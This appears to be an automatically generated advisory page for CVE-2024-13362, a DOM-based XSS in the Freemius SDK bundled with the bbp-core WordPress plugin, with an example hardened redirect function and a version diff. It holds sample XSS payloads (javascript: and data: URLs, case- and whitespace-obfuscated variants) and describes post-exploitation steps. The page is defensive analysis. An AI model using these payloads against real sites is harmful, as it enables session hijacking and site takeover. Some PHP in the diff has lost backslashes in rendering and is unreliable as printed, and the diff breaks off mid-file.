Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : May 10, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (bbp-core)

Plugin: bbp-core
Severity: Medium (CVSS 6.1)
CWE: CWE-79 (Improper Neutralization of Input During Web Page Generation, 'Cross-site Scripting')
Vulnerable Version: 1.2.7 (bbp-core)
Patched Version: 1.2.9 (bbp-core)
Disclosed: April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362:
CVE-2024-13362 is a reflected, DOM-based cross-site scripting flaw in the Freemius SDK, affecting all versions up to and including 2.10.1. Freemius is not installed on its own: it ships embedded inside many WordPress plugins and themes, and a site is exposed through whichever of them carries a vulnerable copy. Here the carrier is bbp-core, which bundled the SDK in 1.2.7 and ships a relocated copy in 1.2.9. The weakness is in how the SDK's admin-side flows handle the 'url' query parameter. An unauthenticated attacker who can get a logged-in user to open a crafted link gets JavaScript executed in that user's browser session on the site's origin. The CVSS score of 6.1 (Medium) reflects the user interaction the attack needs and the fact that the payload runs in a browser rather than on the server.

The root cause is that the 'url' parameter reaches a DOM sink without validation or encoding. In a DOM-based XSS the decisive step happens in the browser: client-side script reads the parameter from the page location and hands it to a navigation or markup sink (document.location, location.href, innerHTML or similar) without checking its scheme or encoding it for the target context, so a javascript: URL, or an injected event handler where the sink writes HTML, executes. The SDK's redirect handling during initialisation and the opt-in/opt-out flow is the implicated code path, entered through start.php and its callback handlers; the exact file path differs between the plugins that embed the SDK, and the diff on this page does not include the SDK files, so the precise sink cannot be identified from this page alone.

Exploitation is a crafted link. The attacker places the payload in the 'url' parameter of a URL pointing at the affected admin page, along the lines of https://victim-site.com/wp-admin/?page=freemius-checkout&url=javascript:alert(document.domain); the page slug there is illustrative rather than a confirmed endpoint, and obfuscated variants (a data: URI, a mixed-case or whitespace-prefixed scheme, or markup carrying an event handler where the sink writes HTML) serve the same purpose against naive string checks. The attack is reflected in the sense that the payload travels in the request URL, but because the sink is in the DOM the payload does not have to appear in the server's HTML response at all: the client script reads it from the location directly. Building and delivering the link requires no authentication; the victim, however, must be persuaded to open it, and must be logged in for the script to run with their privileges.

The fix is to validate the parameter as a URL before it reaches the sink and to encode it for the context it is written into: canonicalise it, accept only the http and https schemes (rejecting javascript:, data: and the rest), and apply that allowlist after URL parsing rather than as a substring match that case or leading whitespace can bypass. On the WordPress side that means esc_url() or esc_url_raw() before a value is passed to JavaScript; on the client it means the same check in script, because a value the script reads from the location never passed through the server's escaping. The diff on this page shows bbp-core moving its bundled SDK from includes/fs/ to vendor/fs/ and does not include the SDK source, so the specific escaping call in the Freemius fix cannot be confirmed here; what removes the bug for a site is running a bbp-core build whose vendor/fs/ copy of the SDK is newer than 2.10.1.
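The source-to-sink flow and the scheme allowlist described above, as an added JavaScript example that is not part of the Freemius SDK, of bbp-core, or of this page's original analysis. The function names (vulnerableRedirect, safeRedirectTarget, hardenedRedirect, demo), the victim.example host and the five sample payloads are constructed for illustration; the browser's location.href sink is replaced by a callback so the code runs under Node, and the sameOrigin option goes one step beyond the scheme restriction the fix description mentions, to show the open-redirect case a scheme check alone leaves open:

```javascript
// Added example for this page. It is not Freemius SDK or bbp-core code; the
// function names, the "victim.example" host and the sample links below are
// constructed for illustration.

// Vulnerable pattern. The client-side script takes the attacker-controlled
// "url" query parameter from the page location and passes it straight to a
// navigation sink. In a browser the sink would be `location.href = target`;
// here it is a callback so the flow can run under Node.
function vulnerableRedirect(pageUrl, navigate) {
  const target = new URL(pageUrl).searchParams.get('url'); // source
  if (target !== null) {
    navigate(target); // sink, no scheme check: a javascript: URL executes
  }
}

// Hardened pattern. Parse first, then allowlist the scheme. The WHATWG URL
// parser strips leading/trailing whitespace and control characters, drops
// embedded tab and newline characters and lowercases the scheme, so
// "\tJaVaScRiPt:" is caught exactly like "javascript:". A substring check
// such as `!target.startsWith('javascript:')` misses every one of those.
// Returns the canonical absolute URL, or null when the target must be refused.
function safeRedirectTarget(pageUrl, rawTarget, options = {}) {
  if (typeof rawTarget !== 'string' || rawTarget.length === 0) {
    return null; // no redirect requested
  }
  let parsed;
  try {
    parsed = new URL(rawTarget, pageUrl); // relative paths resolve against the page
  } catch (err) {
    return null; // unparseable input is refused, not passed through
  }
  if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') {
    return null; // blocks javascript:, data:, vbscript:, file:, blob: ...
  }
  // A scheme allowlist stops script execution but not open redirects:
  // "//evil.example/x" resolves to https://evil.example/x and passes the
  // scheme check. When the parameter is meant to send the user back to the
  // same site, pin the origin as well.
  if (options.sameOrigin && parsed.origin !== new URL(pageUrl).origin) {
    return null;
  }
  return parsed.href;
}

// The hardened check wired into the same flow as vulnerableRedirect.
function hardenedRedirect(pageUrl, navigate, options = {}) {
  const target = new URL(pageUrl).searchParams.get('url');
  const safe = safeRedirectTarget(pageUrl, target, options);
  if (safe !== null) {
    navigate(safe);
  }
  return safe;
}

// Runs constructed payloads through both flows and returns what reached the
// sink in each case, so the difference can be inspected without a browser.
function demo() {
  const page = 'https://victim.example/wp-admin/admin.php?page=bbp-core';
  const payloads = [
    'javascript:alert(document.domain)',
    '\tJaVaScRiPt:alert(document.domain)',
    'data:text/html,<script>alert(1)</script>',
    '/wp-admin/admin.php?page=bbp-core',
    '//evil.example/x',
  ];
  const results = {};
  for (const payload of payloads) {
    const url = page + '&url=' + encodeURIComponent(payload);
    const reachedVulnerable = [];
    vulnerableRedirect(url, (t) => reachedVulnerable.push(t));
    const reachedHardened = hardenedRedirect(url, () => {}, { sameOrigin: true });
    results[payload] = {
      vulnerable: reachedVulnerable.length ? reachedVulnerable[0] : null,
      hardened: reachedHardened,
    };
  }
  return results;
}
```

Calling demo() under node shows every payload reaching the vulnerable sink unchanged, while the hardened flow lets through only the same-origin path. The design point is that the check runs on the parsed URL, not on the raw string, which is what makes the case and whitespace variants fall out for free.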

If exploited, the attacker runs JavaScript in the victim's browser on the site's admin origin. WordPress marks its authentication cookies HttpOnly, so outright cookie theft is normally not available, but it is also not needed: script on the origin can read nonces from the page and issue authenticated same-origin requests as the victim, which is enough to install plugins, create users, change options, or send the user to a phishing page. Damage is bounded by the victim's role; an administrator victim means full site takeover.

Differential between vulnerable and patched code

Below is the diff between bbp-core 1.2.7 and 1.2.9, for reference. Most hunks are whole-file remove-and-re-add pairs whose content is identical on both sides, which is what a line-ending change produces; the visible substantive edits are in bbp-core.php (the final hunk, for Forum_Ajax.php, is cut off before its added lines), and the bundled Freemius SDK files themselves are not part of the diff shown.

Code Diff
--- a/bbp-core/autoloader.php
+++ b/bbp-core/autoloader.php
@@ -1,16 +1,16 @@
-<?php
-spl_autoload_register( 'bbp_core_autoloader' );
-
-/**
- * Autoload files for the plugin
- *
- * @param string $class
- * @return void
- */
-function bbp_core_autoloader( $class ) {
-	$path = __DIR__ . '/includes/' . str_replace( '\', '/', $class ) . '.php';
-
-	if ( file_exists( $path ) ) {
-		include_once $path;
-	}
-}
+<?php
+spl_autoload_register( 'bbp_core_autoloader' );
+
+/**
+ * Autoload files for the plugin
+ *
+ * @param string $class
+ * @return void
+ */
+function bbp_core_autoloader( $class ) {
+	$path = __DIR__ . '/includes/' . str_replace( '\', '/', $class ) . '.php';
+
+	if ( file_exists( $path ) ) {
+		include_once $path;
+	}
+}
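Review bot: every line in this hunk is removed and re-added unchanged, so the change is whitespace or line endings only (CRLF to LF, most likely); regenerate the diff with `git diff --ignore-cr-at-eol` or `-w` so the real edits stand out. Separately, as printed the autoloader reads `str_replace( '\', '/', $class )`, which is not valid PHP because the backslash escapes the closing quote; the actual source almost certainly has `'\\'` and a character was lost in rendering, worth confirming before anyone copies this file from the page.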
--- a/bbp-core/bbp-core.php
+++ b/bbp-core/bbp-core.php
@@ -1,250 +1,271 @@
-<?php
-/*
-Plugin Name:       BBP Core
-Plugin URI:        https://spider-themes.net/bbp-core
-Description:       Expand bbPress powered forums with useful features like - private reply, solved topics ...
-Author:            spider-themes
-Author URI:        https://spider-themes.net/bbp-core
-Text Domain:       bbp-core
-Version:           1.2.7
-Requires at least: 5.0
-Tested up to:      6.6.1
-Requires PHP:      7.4
-License:           GPLv3 or later
-License URI:       https://www.gnu.org/licenses/gpl-3.0.html
-*/
-
-defined( 'ABSPATH' ) || exit;
-
-if ( ! function_exists( 'bc_fs' ) ) {
-	// Create a helper function for easy SDK access.
-	function bc_fs() {
-		global $bc_fs;
-
-		if ( ! isset( $bc_fs ) ) {
-			// Include Freemius SDK.
-			require_once dirname( __FILE__ ) . '/includes/fs/start.php';
-
-			$bc_fs = fs_dynamic_init( array(
-				'id'              => '10864',
-				'slug'            => 'bbp-core',
-				'type'            => 'plugin',
-				'public_key'      => 'pk_41277ad11125f6e2a1b4e66f40164',
-				'is_premium'      => false,
-				'is_premium_only' => false,
-				'has_addons'      => false,
-				'has_paid_plans'  => true,
-				'trial'           => array(
-					'days'               => 14,
-					'is_require_payment' => true,
-				),
-				'menu'            => array(
-					'slug'       => 'bbp-core',
-					'contact'    => false,
-					'support'    => false,
-					'first-path' => 'admin.php?page=bbp-core',
-				),
-			) );
-		}
-
-		return $bc_fs;
-	}
-
-	// Init Freemius.
-	bc_fs()->add_filter( 'deactivate_on_activation', '__return_false' );
-
-	// Signal that SDK was initiated.
-	do_action( 'bc_fs_loaded' );
-}
-
-require_once __DIR__ . '/autoloader.php';
-
-
-/**
- * Plugin's heart
- */
-final class BBP_Core {
-	const VERSION = '1.2.7';
-
-	/**
-	 * Class constructor.
-	 */
-	public function __construct() {
-
-		$this->define_constants();
-		$this->core_includes();
-
-		register_activation_hook( __FILE__, [ $this, 'activate' ] );
-		add_action( 'plugins_loaded', [ $this, 'init_plugin' ] );
-
-		// Added Documentation links to plugin row meta
-		add_filter('plugin_row_meta',[ $this,  'bbpc_row_meta' ], 10, 2);
-	}
-
-	/**
-	 * Define Plugin Constants.
-	 *
-	 * @return void
-	 */
-	public function define_constants() {
-		define( 'BBPC_VERSION', self::VERSION );
-		define( 'BBPC_FILE', __FILE__ );
-		define( 'BBPC_DIR', __DIR__ . '/' );
-		define( 'BBPC_URL', plugins_url( '/', __FILE__ ) );
-		define( 'BBPC_ASSETS', BBPC_URL . 'assets/' );
-		define( 'BBPC_IMG', BBPC_ASSETS . 'img/' );
-	}
-
-	/**
-	 * File includes.
-	 */
-	public function core_includes() {
-		require_once __DIR__ . '/includes/functions.php';
-		require_once __DIR__ . '/includes/admin/menu/Approve_Topic.php';
-		require_once __DIR__ . '/includes/admin/menu/Create_Forum.php';
-		require_once __DIR__ . '/includes/admin/menu/Create_Topic.php';
-		require_once __DIR__ . '/includes/admin/menu/Delete_Forum.php';
-		require_once __DIR__ . '/includes/admin/menu/Delete_Topic.php';
-		require_once __DIR__ . '/includes/Elementor/BBP_Widgets.php';
-		require_once __DIR__ . '/includes/ajax_actions.php';
-		include_once( ABSPATH . 'wp-admin/includes/plugin.php' );
-		require_once __DIR__ . '/includes/Frontend/Assets.php';
-
-		require_once __DIR__ . '/includes/admin/widgets/forum-info/widgets.php';
-		require_once __DIR__ . '/includes/Elementor/inc/forum-ajax.php';
-
-		// Core installer notice
-		require_once __DIR__ . '/includes/admin/notices/notices.php';
-		require_once __DIR__ . '/includes/admin/notices/asking-for-review.php';
-
-		//Register Pro Widgets
-		$theme = wp_get_theme();
-
-		if ( $theme->get( 'Name' ) != 'Ama' || ! bbpc_is_premium() ) {
-			require_once __DIR__ . '/includes/admin/Pro_Widget_Map.php';
-			require_once __DIR__ . '/includes/admin/Pro_Widget_Service.php';
-		}
-
-		// Hooks
-		require BBPC_DIR . 'includes/hooks/actions.php';
-		require BBPC_DIR . 'includes/hooks/image_sizes.php';
-
-		// Load CSF
-		require BBPC_DIR . 'includes/admin/settings/csf/classes/setup.class.php';
-		require BBPC_DIR . 'includes/admin/settings/options/settings.php';
-	}
-
-	/**
-	 *  Initializing Bbp_core class.
-	 *
-	 * @return Bbp_core
-	 */
-	static function init() {
-		static $instance = false;
-
-		if ( ! $instance ) {
-			$instance = new self();
-		}
-	}
-
-	/**
-	 * Actions on plugin activation.
-	 *
-	 * @return void
-	 */
-	public function activate() {
-		$installed = get_option( 'bbpc_installed' );
-		if ( ! $installed ) {
-			update_option( 'bbpc_installed', time() );
-		}
-
-		update_option( 'bbpc_version', BBPC_VERSION );
-	}
-
-	/**
-	 * Initialize the plugin functionality.
-	 *
-	 * @return void
-	 */
-	public function init_plugin() {
-
-		$this->load_features();
-
-		if ( is_admin() ) {
-			new Admin();
-			new adminAssets();
-		}elseif ( ! is_admin() ) {
-			new FrontendAssets();
-		}
-
-		// If bbPress is not active, don't load assets and widgets.
-		if ( ! class_exists( 'bbPress' ) ) {
-			return;
-		}
-		new adminElementorBBP_Widgets();
-	}
-
-
-	/**
-	 * Load different features.
-	 *
-	 * @return void
-	 */
-	public function load_features() {
-		$opt = get_option( 'bbp_core_settings' );
-		define( 'BBPC_FEAT_PATH', plugin_dir_path( __FILE__ ) . 'includes/features/' );
-
-		if ( $opt['is_solved_topics'] ?? true ) {
-			require BBPC_FEAT_PATH . 'bbp_solved_topic.php';
-		}
-
-		if ( $opt['is_private_replies'] ?? true ) {
-			require BBPC_FEAT_PATH . 'bbp-private-replies.php';
-		}
-
-		if ( bbpc_is_premium() || class_exists('BBPC_GEO_ROLES') ) {
-			$reactions = $opt['agree_disagree_voting'] ?? '';
-			if ( ! empty ( $reactions ) ) {
-			  require BBPC_FEAT_PATH . 'bbp_voting/agree-disagree/init.php';
-			  require BBPC_FEAT_PATH . 'bbp_voting/agree-disagree/actions.php';
-			}
-		  }
-
-		if ( $opt['is_votes'] ?? true ) {
-			new featuresbbp_voting();
-		}
-
-		if ( $opt['is_attachment'] ?? true ) {
-			new featuresbbp_attachments();
-		}
-	}
-
-	/**
-	 * Documentation links to plugin row meta
-	 */
-	public function bbpc_row_meta($links, $file) {
-		// Check if this is your plugin
-		if (plugin_basename(__FILE__) === $file) {
-			// Add your custom links
-			$plugin_links = array(
-				'<a href="https://helpdesk.spider-themes.net/docs/bbp-core-wordpress-plugin/" target="_blank">Documentation</a>'
-			);
-			// Merge the custom links with the existing links
-			$links = array_merge($links, $plugin_links);
-		}
-		return $links;
-	}
-	// end
-
-}
-
-/**
- * Initialize the bbp core plugin.
- *
- * @return Bbp_core
- */
-function bbp_core() {
-	return Bbp_core::init();
-}
-
+<?php
+/*
+Plugin Name:       BBP Core
+Plugin URI:        https://spider-themes.net/bbp-core
+Description:       Expand bbPress powered forums with useful features like - private reply, solved topics ...
+Author:            spider-themes
+Author URI:        https://spider-themes.net/bbp-core
+Text Domain:       bbp-core
+Version:           1.2.9
+Requires at least: 5.0
+Tested up to:      6.6.1
+Requires PHP:      7.4
+License:           GPLv3 or later
+License URI:       https://www.gnu.org/licenses/gpl-3.0.html
+*/
+
+defined( 'ABSPATH' ) || exit;
+
+if ( ! function_exists( 'bc_fs' ) ) {
+	// Create a helper function for easy SDK access.
+	function bc_fs() {
+		global $bc_fs;
+
+		if ( ! isset( $bc_fs ) ) {
+			// Include Freemius SDK.
+			require_once dirname( __FILE__ ) . '/vendor/fs/start.php';
+
+			$bc_fs = fs_dynamic_init( [
+				'id'              => '10864',
+				'slug'            => 'bbp-core',
+				'type'            => 'plugin',
+				'public_key'      => 'pk_41277ad11125f6e2a1b4e66f40164',
+				'is_premium'      => false,
+				'is_premium_only' => false,
+				'has_addons'      => false,
+				'has_paid_plans'  => true,
+				'trial'           => [
+					'days'               => 14,
+					'is_require_payment' => true,
+				],
+				'menu'            => [
+					'slug'       => 'bbp-core',
+					'contact'    => false,
+					'support'    => false,
+					'first-path' => 'admin.php?page=bbp-core',
+				],
+			] );
+		}
+
+		return $bc_fs;
+	}
+
+	// Init Freemius.
+	bc_fs()->add_filter( 'deactivate_on_activation', '__return_false' );
+
+	// Signal that SDK was initiated.
+	do_action( 'bc_fs_loaded' );
+}
+
+require_once __DIR__ . '/autoloader.php';
+
+
+/**
+ * Plugin's heart
+ */
+final class BBP_Core {
+	const VERSION = '1.2.9';
+
+	/**
+	 * Class constructor.
+	 */
+	public function __construct() {
+
+		$this->define_constants();
+		$this->core_includes();
+
+		register_activation_hook( __FILE__, [ $this, 'activate' ] );
+		add_action( 'plugins_loaded', [ $this, 'init_plugin' ] );
+
+		// Added Documentation links to plugin row meta
+		add_filter('plugin_row_meta',[ $this,  'bbpc_row_meta' ], 10, 2);
+
+		/**
+		 * Removes admin notices on the BBP Core Forum builder page.
+		 *
+		 * @return void
+		 */
+		add_action( 'admin_head', function () {
+			// Get the current screen
+			$screen = get_current_screen();
+
+			// Check if the current screen is for your plugin page
+			if ( isset( $_GET['page'] ) && in_array( $_GET['page'], [ 'bbp-core' ] ) ) {
+				// Remove admin notices
+				remove_all_actions( 'admin_notices' );
+				remove_all_actions( 'all_admin_notices' );
+
+				// Re-add a specific notice
+				if ( !bbpc_is_premium() && bbpc_is_plugin_installed_for_days(12) ) {
+					add_action('admin_notices', 'bbpc_offer_notice');
+				}
+			}
+		});
+	}
+
+	/**
+	 * Define Plugin Constants.
+	 *
+	 * @return void
+	 */
+	public function define_constants() {
+		define( 'BBPC_VERSION', self::VERSION );
+		define( 'BBPC_FILE', __FILE__ );
+		define( 'BBPC_DIR', __DIR__ . '/' );
+		define( 'BBPC_URL', plugins_url( '/', __FILE__ ) );
+		define( 'BBPC_ASSETS', BBPC_URL . 'assets/' );
+		define( 'BBPC_IMG', BBPC_ASSETS . 'img/' );
+	}
+
+	/**
+	 * File includes.
+	 */
+	public function core_includes() {
+		require_once __DIR__ . '/includes/functions.php';
+		require_once __DIR__ . '/includes/admin/menu/Approve_Topic.php';
+		require_once __DIR__ . '/includes/admin/menu/Create_Forum.php';
+		require_once __DIR__ . '/includes/admin/menu/Create_Topic.php';
+		require_once __DIR__ . '/includes/admin/menu/Delete_Forum.php';
+		require_once __DIR__ . '/includes/admin/menu/Delete_Topic.php';
+		require_once __DIR__ . '/includes/Elementor/BBP_Widgets.php';
+		require_once __DIR__ . '/includes/ajax_actions.php';
+		include_once( ABSPATH . 'wp-admin/includes/plugin.php' );
+		require_once __DIR__ . '/includes/Frontend/Assets.php';
+
+		require_once __DIR__ . '/includes/admin/widgets/forum-info/widgets.php';
+		require_once __DIR__ . '/includes/Elementor/inc/forum-ajax.php';
+
+		// Core installer notice
+		require_once __DIR__ . '/includes/admin/notices/_notices.php';
+
+		//Register Pro Widgets
+		$theme = wp_get_theme();
+
+		if ( $theme->get( 'Name' ) != 'Ama' || ! bbpc_is_premium() ) {
+			require_once __DIR__ . '/includes/admin/Pro_Widget_Map.php';
+			require_once __DIR__ . '/includes/admin/Pro_Widget_Service.php';
+		}
+
+		// Hooks
+		require BBPC_DIR . 'includes/hooks/actions.php';
+		require BBPC_DIR . 'includes/hooks/image_sizes.php';
+
+		// Load CSF
+		require BBPC_DIR . 'includes/admin/settings/csf/classes/setup.class.php';
+		require BBPC_DIR . 'includes/admin/settings/options/settings.php';
+	}
+
+	/**
+	 *  Initializing Bbp_core class.
+	 *
+	 * @return Bbp_core
+	 */
+	static function init() {
+		static $instance = false;
+
+		if ( ! $instance ) {
+			$instance = new self();
+		}
+	}
+
+	/**
+	 * Actions on plugin activation.
+	 *
+	 * @return void
+	 */
+	public function activate() {
+		$installed = get_option( 'bbpc_installed' );
+		if ( ! $installed ) {
+			update_option( 'bbpc_installed', time() );
+		}
+
+		update_option( 'bbpc_version', BBPC_VERSION );
+	}
+
+	/**
+	 * Initialize the plugin functionality.
+	 *
+	 * @return void
+	 */
+	public function init_plugin() {
+
+		$this->load_features();
+
+		if ( is_admin() ) {
+			new Admin();
+			new adminAssets();
+		}elseif ( ! is_admin() ) {
+			new FrontendAssets();
+		}
+
+		// If bbPress is not active, don't load assets and widgets.
+		if ( ! class_exists( 'bbPress' ) ) {
+			return;
+		}
+		new adminElementorBBP_Widgets();
+	}
+
+
+	/**
+	 * Load different features.
+	 *
+	 * @return void
+	 */
+	public function load_features() {
+		$opt = get_option( 'bbp_core_settings' );
+		define( 'BBPC_FEAT_PATH', plugin_dir_path( __FILE__ ) . 'includes/features/' );
+
+		if ( $opt['is_solved_topics'] ?? true ) {
+			require BBPC_FEAT_PATH . 'bbp_solved_topic.php';
+		}
+
+		if ( $opt['is_private_replies'] ?? true ) {
+			require BBPC_FEAT_PATH . 'bbp-private-replies.php';
+		}
+
+		if ( bbpc_is_premium() || class_exists('BBPC_GEO_ROLES') ) {
+			$reactions = $opt['agree_disagree_voting'] ?? '';
+			if ( ! empty ( $reactions ) ) {
+			  require BBPC_FEAT_PATH . 'bbp_voting/agree-disagree/init.php';
+			  require BBPC_FEAT_PATH . 'bbp_voting/agree-disagree/actions.php';
+			}
+		  }
+
+		if ( $opt['is_votes'] ?? true ) {
+			new featuresbbp_voting();
+		}
+
+		if ( $opt['is_attachment'] ?? true ) {
+			new featuresbbp_attachments();
+		}
+	}
+
+	/**
+	 * Documentation links to plugin row meta
+	 */
+	public function bbpc_row_meta($links, $file) {
+		// Check if this is your plugin
+		if (plugin_basename(__FILE__) === $file) {
+			// Add your custom links
+			$plugin_links = array(
+				'<a href="https://helpdesk.spider-themes.net/docs/bbp-core-wordpress-plugin/" target="_blank">Documentation</a>'
+			);
+			// Merge the custom links with the existing links
+			$links = array_merge($links, $plugin_links);
+		}
+		return $links;
+	}
+	// end
+
+}
+
+/**
+ * Initialize the bbp core plugin.
+ *
+ * @return Bbp_core
+ */
+function bbp_core() {
+	return Bbp_core::init();
+}
+
 bbp_core();
 No newline at end of file
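Review bot: this hunk does not contain the XSS fix; the only SDK-related change is `require_once dirname( __FILE__ ) . '/vendor/fs/start.php'` replacing the `includes/fs/start.php` path, so whether the bundled Freemius copy is newer than 2.10.1 has to be checked in `vendor/fs/`, which the diff omits. In the new `admin_head` callback, `$screen = get_current_screen();` is assigned and never used, and `in_array( $_GET['page'], [ 'bbp-core' ] )` compares unslashed, unsanitized input loosely; `'bbp-core' === sanitize_text_field( wp_unslash( $_GET['page'] ) )` matches the strict comparison `Admin::body_class` already uses. Minor: `init()` is documented as returning the instance but returns nothing, and `elseif ( ! is_admin() )` is redundant after `if ( is_admin() )`.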
--- a/bbp-core/includes/Admin.php
+++ b/bbp-core/includes/Admin.php
@@ -1,34 +1,34 @@
-<?php
-class Admin {
-	/**
-	 * Admin class construct
-	 */
-	public function __construct() {
-		add_filter( 'admin_body_class', [ $this, 'body_class' ] );
-		new adminMenu();
-	}
-
-	/**
-	 * Add body class to admin pages.
-	 *
-	 * @param string $classes Body classes.
-	 * @return string
-	 */
-	public function body_class( $classes ) {
-		// if current page is ?page=bbp-core in admin.
-		if ( isset( $_GET['page'] ) && 'bbp-core' === $_GET['page'] ) {
-			$classes .= ' bbpc-forum-ui';
-		}
-
-		// if has no pro plan.
-		if ( bbpc_is_premium() !== true ) {
-			$classes .= ' bbpc-no-pro';
-		}
-
-		if ( class_exists( 'BBPC_GEO_ROLES' ) ) {
-			$classes .= ' bbpc-geo-roles';
-		}
-
-		return $classes;
-	}
-}
+<?php
+class Admin {
+	/**
+	 * Admin class construct
+	 */
+	public function __construct() {
+		add_filter( 'admin_body_class', [ $this, 'body_class' ] );
+		new adminMenu();
+	}
+
+	/**
+	 * Add body class to admin pages.
+	 *
+	 * @param string $classes Body classes.
+	 * @return string
+	 */
+	public function body_class( $classes ) {
+		// if current page is ?page=bbp-core in admin.
+		if ( isset( $_GET['page'] ) && 'bbp-core' === $_GET['page'] ) {
+			$classes .= ' bbpc-forum-ui';
+		}
+
+		// if has no pro plan.
+		if ( bbpc_is_premium() !== true ) {
+			$classes .= ' bbpc-no-pro';
+		}
+
+		if ( class_exists( 'BBPC_GEO_ROLES' ) ) {
+			$classes .= ' bbpc-geo-roles';
+		}
+
+		return $classes;
+	}
+}
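Review bot: no content change here either; the hunk is another whole-file rewrite that adds review noise. The `isset( $_GET['page'] ) && 'bbp-core' === $_GET['page']` check is acceptable as-is, since it is a strict comparison against a literal and nothing from the parameter is echoed.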
--- a/bbp-core/includes/Elementor/BBP_Widgets.php
+++ b/bbp-core/includes/Elementor/BBP_Widgets.php
@@ -1,76 +1,76 @@
-<?php
-namespace adminElementor;
-
-use adminPro_Widget_Map;
-
-class BBP_Widgets {
-
-    public function __construct() {
-
-        // Register Widgets
-        add_action( 'elementor/widgets/widgets_registered', [ $this, 'register_widgets' ] );
-
-        // Register Category
-        add_action( 'elementor/elements/categories_registered', [ $this, 'register_category' ] );
-	    add_action( 'elementor/editor/before_enqueue_scripts', [ $this, 'register_elementor_editor_assets' ] );
-
-        // Register Elementor Preview Editor Scripts
-        $currentTheme = wp_get_theme()->get( 'Name' )  == 'Ama' ? true : false;
-        $returnType   = bbpc_is_premium() == true ? true : $currentTheme;
-        if ( $returnType != 1 ) {
-            add_action('elementor/editor/after_enqueue_scripts', [$this, 'enqueue_editor_scripts']);
-        }
-    }
-
-
-    /**
-     * @return void
-     *
-     */
-    public function enqueue_editor_scripts() {
-
-        wp_enqueue_script('bbpc-el-editor', BBPC_ASSETS . 'admin/js/bbpc-el-editor.js', [], '1.0.0', true);
-
-        $localize_data = [];
-        $pro_widget_map = new Pro_Widget_Map();
-        $localize_data['promotional_widgets'] = $pro_widget_map->get_pro_widget_map();
-        wp_localize_script('bbpc-el-editor', 'BbpcConfig', $localize_data);
-    }
-
-
-    // Register Widgets
-    public function register_widgets( $widgets_manager ) {
-
-        $theme = wp_get_theme();
-
-        // Include Widget files
-        if ( $theme == 'Ama' || bbpc_is_premium() ) {
-            require_once( __DIR__ . '/Single_forum.php' );
-            require_once( __DIR__ . '/Forum_Ajax.php' );
-            require_once( __DIR__ . '/Forum_posts.php' );
-            require_once( __DIR__ . '/Forums.php' );
-            require_once( __DIR__ . '/Forum_Tab.php' );
-            require_once( __DIR__ . '/Search.php' );
-
-            $widgets_manager->register( new Single_forum() );
-            $widgets_manager->register( new Forum_Ajax() );
-            $widgets_manager->register( new Forum_posts() );
-            $widgets_manager->register( new Forums() );
-            $widgets_manager->register( new Forum_Tab() );
-            $widgets_manager->register( new Search() );
-        }
-    }
-
-    // Register category
-    public function register_category( $elements_manager ) {
-        $elements_manager->add_category(
-            'bbp-core', [
-                'title' => __( 'BBP Core', 'bbp-core' ),
-            ]
-        );
-    }
-
-	function register_elementor_editor_assets() {
-		wp_enqueue_style( 'bbpc-el-editor', BBPC_ASSETS . 'css/elementor-editor.css' );
-	}
+<?php
+namespace adminElementor;
+
+use adminPro_Widget_Map;
+
+class BBP_Widgets {
+
+    public function __construct() {
+
+        // Register Widgets
+        add_action( 'elementor/widgets/widgets_registered', [ $this, 'register_widgets' ] );
+
+        // Register Category
+        add_action( 'elementor/elements/categories_registered', [ $this, 'register_category' ] );
+	    add_action( 'elementor/editor/before_enqueue_scripts', [ $this, 'register_elementor_editor_assets' ] );
+
+        // Register Elementor Preview Editor Scripts
+        $currentTheme = wp_get_theme()->get( 'Name' )  == 'Ama' ? true : false;
+        $returnType   = bbpc_is_premium() == true ? true : $currentTheme;
+        if ( $returnType != 1 ) {
+            add_action('elementor/editor/after_enqueue_scripts', [$this, 'enqueue_editor_scripts']);
+        }
+    }
+
+
+    /**
+     * @return void
+     *
+     */
+    public function enqueue_editor_scripts() {
+
+        wp_enqueue_script('bbpc-el-editor', BBPC_ASSETS . 'admin/js/bbpc-el-editor.js', [], '1.0.0', true);
+
+        $localize_data = [];
+        $pro_widget_map = new Pro_Widget_Map();
+        $localize_data['promotional_widgets'] = $pro_widget_map->get_pro_widget_map();
+        wp_localize_script('bbpc-el-editor', 'BbpcConfig', $localize_data);
+    }
+
+
+    // Register Widgets
+    public function register_widgets( $widgets_manager ) {
+
+        $theme = wp_get_theme();
+
+        // Include Widget files
+        if ( $theme == 'Ama' || bbpc_is_premium() ) {
+            require_once( __DIR__ . '/Single_forum.php' );
+            require_once( __DIR__ . '/Forum_Ajax.php' );
+            require_once( __DIR__ . '/Forum_posts.php' );
+            require_once( __DIR__ . '/Forums.php' );
+            require_once( __DIR__ . '/Forum_Tab.php' );
+            require_once( __DIR__ . '/Search.php' );
+
+            $widgets_manager->register( new Single_forum() );
+            $widgets_manager->register( new Forum_Ajax() );
+            $widgets_manager->register( new Forum_posts() );
+            $widgets_manager->register( new Forums() );
+            $widgets_manager->register( new Forum_Tab() );
+            $widgets_manager->register( new Search() );
+        }
+    }
+
+    // Register category
+    public function register_category( $elements_manager ) {
+        $elements_manager->add_category(
+            'bbp-core', [
+                'title' => __( 'BBP Core', 'bbp-core' ),
+            ]
+        );
+    }
+
+	function register_elementor_editor_assets() {
+		wp_enqueue_style( 'bbpc-el-editor', BBPC_ASSETS . 'css/elementor-editor.css' );
+	}
 }
 No newline at end of file
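Review bot: identical before and after, whitespace-only. Two pre-existing points: `register_widgets()` compares `$theme == 'Ama'` where `$theme` is the `WP_Theme` object from `wp_get_theme()` (it works through `__toString()`, but `$theme->get( 'Name' )` as used in the constructor is the explicit form), and `$returnType != 1` is a loose boolean-to-int comparison; `if ( ! bbpc_is_premium() && ! $currentTheme )` says the same thing directly. Also note that `namespace adminElementor;` and `use adminPro_Widget_Map;` have lost their namespace separators in rendering, as have the `features...` and `admin...` class names in bbp-core.php.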
--- a/bbp-core/includes/Elementor/Forum_Ajax.php
+++ b/bbp-core/includes/Elementor/Forum_Ajax.php
@@ -1,358 +1,360 @@
-<?php
-
-namespace adminElementor;
-
-use ElementorControls_Manager;
-use ElementorWidget_Base;
-use WP_Query;
-
-// Exit if accessed directly
-if ( ! defined( 'ABSPATH' ) ) {
-	exit;
-}
-
-class Forum_Ajax extends Widget_Base {
-	public function get_name() {
-		return 'ama_ajax_forum';
-	}
-
-	public function get_title() {
-		return esc_html__( 'BBPC Ajax Forums', 'bbp-core' );
-	}
-
